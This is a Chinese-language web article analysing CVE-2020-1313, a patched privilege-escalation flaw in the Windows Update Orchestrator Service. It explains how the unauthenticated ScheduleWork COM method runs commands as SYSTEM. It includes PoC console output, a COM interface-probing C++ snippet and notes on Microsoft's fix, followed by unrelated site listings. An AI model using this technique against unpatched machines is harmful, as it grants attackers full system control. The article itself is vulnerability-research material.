CVE-2020-1313漏洞分析与利用PoC

蓮花仙者

发布时间：2025-09-07 08:59:16

606人浏览过

来源于php中文网

原创

cve-2020-1313漏洞分析与利用poc

前言

Windows Update Orchestrator Service（简称USO）是一个DCOM服务，用于管理Windows系统内其他组件下载并安装更新的过程。然而，该服务在认证调用函数时存在缺陷，使其易受权限提升攻击的影响，允许任意用户提升至本地系统权限。此漏洞影响了Windows 10和Windows Server Core产品。

漏洞分析

UniversalOrchestrator服务（9C695035-48D2-4229-8B73-4C70E756E519）由usosvc.dll实现，并以NT_AUTHORITY\SYSTEM权限运行。即使该服务的COM类枚举功能已被禁用，但IUniversalOrchestrator接口（c53f3549-0dbf-429a-8297-c812ba00742d）仍可以通过标准的COM API访问。以下是暴露的三个方法：

virtual HRESULT __stdcall HasMoratoriumPassed(wchar_t* uscheduledId, int64_t* p1);//usosvc!UniversalOrchestrator::HasMoratoriumPassed
virtual HRESULT __stdcall ScheduleWork(wchar_t* uscheduledId, wchar_t* cmdLine, wchar_t* startArg, wchar_t* pauseArg);//usosvc!UniversalOrchestrator::ScheduleWork
virtual HRESULT __stdcall WorkCompleted(wchar_t* uscheduledId, int64_t p1);//usosvc!UniversalOrchestrator::WorkCompleted

ScheduleWork方法可以在服务的上下文环境下设置命令执行的计划任务，无需任何认证。目标可执行文件必须具备数字签名，并位于“c:\windows\system32”或“Program Files”目录下。然而，通过命令行参数执行目标可执行文件，我们可以启动“c:\windows\system32\cmd.exe”，并以NT_AUTHORITY\SYSTEM权限执行任意代码，从而实现提权。

概念验证PoC

C:\111>whoami
desktop-43rnlku\unprivileged
C:\111>whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name                Description                          State
============================= ==================================== ========
SeShutdownPrivilege           Shut down the system                 Disabled
SeChangeNotifyPrivilege       Bypass traverse checking             Enabled
SeUndockPrivilege             Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set       Disabled
SeTimeZonePrivilege           Change the time zone                 Disabled
C:\111>whoami /priv
C:\111>UniversalOrchestratorPrivEscPoc.exe
Obtaining reference to IUniversalOrchestrator
Scheduing work with id 56594
Succeeded. You may verify HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Orchestrator\UScheduler to see the task has indeed been onboarded. The command itself will be executed overnight if there is no user interaction on the box or after 3 days SLA has passed.

计划任务的入口点将添加到注册表中：

CVE-2020-1313漏洞分析与利用PoC

指定的命令可以在无需用户交互的情况下，于夜间（约23:20）执行。

漏洞发现过程

由于无法通过OleView.NET获取USO服务的接口定义，我创建了一个脚本来遍历大量的CLSID/IID组合，发现了以下内容：

Veggie AI

Veggie AI 是一款利用AI技术生成可控视频的在线工具

下载

void TestUpdateOrchestratorInterfaceAgainstService(IID& clsId, const char* className, const wchar_t* iidStr, const char *interfaceName){
    void *ss = NULL;
    IID iid;
    ThrowOnError(IIDFromString(iidStr, (LPCLSID)&iid)); // working with e at the end, failing with anything else
    HRESULT res = CoCreateInstance(clsId, nullptr, CLSCTX_LOCAL_SERVER, iid, (LPVOID*)&ss);
    printf("%s %s: %s\n", className, interfaceName, res == S_OK ? "WORKING" : "failure");
}
void TestUpdateOrchestratorInterface(const wchar_t* iidStr, const char *interfaceName){
    // TestUpdateOrchestratorInterfaceAgainstService(CLSID_AutomaticUpdates, "AutomaticUpdates", iidStr, interfaceName); // timeouting!
    TestUpdateOrchestratorInterfaceAgainstService(CLSID_UxUpdateManager, "UxUpdateManager", iidStr, interfaceName);
    TestUpdateOrchestratorInterfaceAgainstService(CLSID_UsoService, "UsoService", iidStr, interfaceName);
    TestUpdateOrchestratorInterfaceAgainstService(CLSID_UpdateSessionOrchestrator, "UpdateSessionOrchestrator", iidStr, interfaceName);
    TestUpdateOrchestratorInterfaceAgainstService(CLSID_UniversalOrchestrator, "UniversalOrchestrator", iidStr, interfaceName);
    // TestUpdateOrchestratorInterfaceAgainstService(CLSID_SomeService, "SomeService", iidStr, interfaceName); // timeouting!
}
...
TestUpdateOrchestratorInterface(L"{c57692f8-8f5f-47cb-9381-34329b40285a}", "IMoUsoOrchestrator");
TestUpdateOrchestratorInterface(L"{4284202d-4dc1-4c68-a21e-5c371dd92671}", "IMoUsoUpdate");
TestUpdateOrchestratorInterface(L"{c879dd73-4bd2-4b76-9dd8-3b96113a2130}", "IMoUsoUpdateCollection");
        // ... and hundreds of more

方法的执行结果如下：

UniversalOrchestrator IUniversalOrchestrator: WORKING
UpdateSessionOrchestrator IUpdateSessionOrchestrator: WORKING
UxUpdateManager IUxUpdateManager: WORKING

通过逆向工程分析上述方法，我发现了本文介绍的漏洞。

漏洞修复

微软已在2020年6月的漏洞补丁中，通过添加CoImpersonateClient API调用修复了此问题。

在部署漏洞补丁之前，方法的实现代码如下：

CVE-2020-1313漏洞分析与利用PoC

部署漏洞补丁后，方法的实现代码如下：

CVE-2020-1313漏洞分析与利用PoC

实际上，身份伪装是在处理请求的开始时完成的，因此更新注册表的API调用是在调用方的安全上下文中执行的。如果调用方没有访问HKEY_LOCAL_MACHINE的高级权限，那么USO API方法也将无法被执行。

参考文档

Win10路由器怎么设置动态dns Win10动态dns设置方法【指南】

Win11激活工具安全吗_评估激活工具安全性避免风险【警示】

Win10修改默认浏览器教程 Win10设置默认应用程序的步骤【必会】

Win11 USB传输速度慢怎么解决 Win11 USB驱动更新与设置

Win11玩永劫无间卡顿怎么办 Win11永劫无间帧数优化设置

相关专题

硬盘接口类型介绍

硬盘接口类型有IDE、SATA、SCSI、Fibre Channel、USB、eSATA、mSATA、PCIe等等。详细介绍：1、IDE接口是一种并行接口，主要用于连接硬盘和光驱等设备，它主要有两种类型：ATA和ATAPI，IDE接口已经逐渐被SATA接口；2、SATA接口是一种串行接口，相较于IDE接口，它具有更高的传输速度、更低的功耗和更小的体积；3、SCSI接口等等。

1027

2023.10.19

PHP接口编写教程

本专题整合了PHP接口编写教程，阅读专题下面的文章了解更多详细内容。

2025.10.17

php8.4实现接口限流的教程

PHP8.4本身不内置限流功能，需借助Redis（令牌桶）或Swoole（漏桶）实现；文件锁因I/O瓶颈、无跨机共享、秒级精度等缺陷不适用高并发场景。本专题为大家提供相关的文章、下载、课程内容，供大家免费下载体验。

454

2025.12.29

java接口相关教程

本专题整合了java接口相关内容，阅读专题下面的文章了解更多详细内容。

2026.01.19

windows查看端口占用情况

Windows端口可以认为是计算机与外界通讯交流的出入口。逻辑意义上的端口一般是指TCP/IP协议中的端口，端口号的范围从0到65535，比如用于浏览网页服务的80端口，用于FTP服务的21端口等等。怎么查看windows端口占用情况呢？php中文网给大家带来了相关的教程以及文章，欢迎大家前来阅读学习。

601

2023.07.26

查看端口占用情况windows

端口占用是指与端口关联的软件占用端口而使得其他应用程序无法使用这些端口，端口占用问题是计算机系统编程领域的一个常见问题，端口占用的根本原因可能是操作系统的一些错误，服务器也可能会出现端口占用问题。php中文网给大家带来了相关的教程以及文章，欢迎大家前来学习阅读。

1104

2023.07.27

windows照片无法显示

当我们尝试打开一张图片时，可能会出现一个错误提示，提示说"Windows照片查看器无法显示此图片，因为计算机上的可用内存不足"，本专题为大家提供windows照片无法显示相关的文章，帮助大家解决该问题。

792

2023.08.01

windows查看端口被占用的情况

windows查看端口被占用的情况的方法：1、使用Windows自带的资源监视器；2、使用命令提示符查看端口信息；3、使用任务管理器查看占用端口的进程。本专题为大家提供windows查看端口被占用的情况的相关的文章、下载、课程内容，供大家免费下载体验。

452

2023.08.02

Java JVM 原理与性能调优实战

本专题系统讲解 Java 虚拟机（JVM）的核心工作原理与性能调优方法，包括 JVM 内存结构、对象创建与回收流程、垃圾回收器（Serial、CMS、G1、ZGC）对比分析、常见内存泄漏与性能瓶颈排查，以及 JVM 参数调优与监控工具（jstat、jmap、jvisualvm）的实战使用。通过真实案例，帮助学习者掌握 Java 应用在生产环境中的性能分析与优化能力。

2026.01.20

热门下载

网站特效

网站源码

网站素材

前端模板